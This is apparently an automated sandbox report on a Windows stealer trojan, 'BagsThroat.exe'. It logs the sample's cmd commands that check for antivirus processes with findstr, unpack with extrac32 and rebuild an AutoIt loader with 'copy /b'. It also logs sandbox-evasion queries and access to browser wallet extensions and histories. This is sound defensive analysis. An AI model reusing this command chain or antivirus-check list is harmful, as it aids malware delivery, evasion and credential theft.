      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\PaxilMs
Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\EstimatesYu
Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\SubcommitteeDiff
Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\EmailJd
Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\CityCause
Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\SustainablePurchased
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: String function: 004062CF appears 57 times
      Source: BagsThroat.exeStatic PE information: invalid certificate
      Source: BagsThroat.exe, 00000000.00000002.2018080360.0000000000716000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs BagsThroat.exe
      Source: BagsThroat.exe, 00000000.00000003.2017080845.0000000000716000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs BagsThroat.exe
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/23@2/1
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Discovered
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Users\user\AppData\Local\Temp\nsk371C.tmp
      Source: BagsThroat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\BagsThroat.exeFile read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\BagsThroat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\BagsThroat.exeFile read: C:\Users\user\Desktop\BagsThroat.exe
      Source: unknownProcess created: C:\Users\user\Desktop\BagsThroat.exe "C:\Users\user\Desktop\BagsThroat.exe"
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 441412
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Discovered
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Detailed" Eat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 441412\Noted.com + Button + Pledge + Ve + Michael + Barely + Managers + Boolean + Speeches + Heights + Tim 441412\Noted.com
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Portrait + ..\Colored + ..\Classic + ..\Overseas + ..\Theaters + ..\Plays + ..\Continued S
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com Noted.com S
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: version.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: shfolder.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: propsys.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: riched20.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: usp10.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: msls31.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: textinputframework.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: coremessaging.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: ntmarta.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: textshaping.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: profapi.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: edputil.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: urlmon.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: iertutil.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: srvcli.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: netutils.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: appresolver.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: slc.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: userenv.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: sppc.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\BagsThroat.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: BagsThroat.exeStatic file information: File size 1112940 > 1048576
      Source: BagsThroat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: BagsThroat.exeStatic PE information: real checksum: 0x116e13 should be: 0x11ec1a

      Persistence and Installation Behavior

      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | System information queried: FirmwareTableInformation
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com TID: 6480 | Thread sleep time: -90000s >= -30000s
      Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\BagsThroat.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\BagsThroat.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\BagsThroat.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\BagsThroat.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmd
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 441412
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Discovered
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Detailed" Eat
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 441412\Noted.com + Button + Pledge + Ve + Michael + Barely + Managers + Boolean + Speeches + Heights + Tim 441412\Noted.com
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Portrait + ..\Colored + ..\Classic + ..\Overseas + ..\Theaters + ..\Plays + ..\Continued S
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com Noted.com S
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: Noted.com, 0000000D.00000000.2054280944.0000000000973000.00000002.00000001.01000000.00000007.sdmp, Noted.com.2.dr, Speeches.9.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\BagsThroat.exe | Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
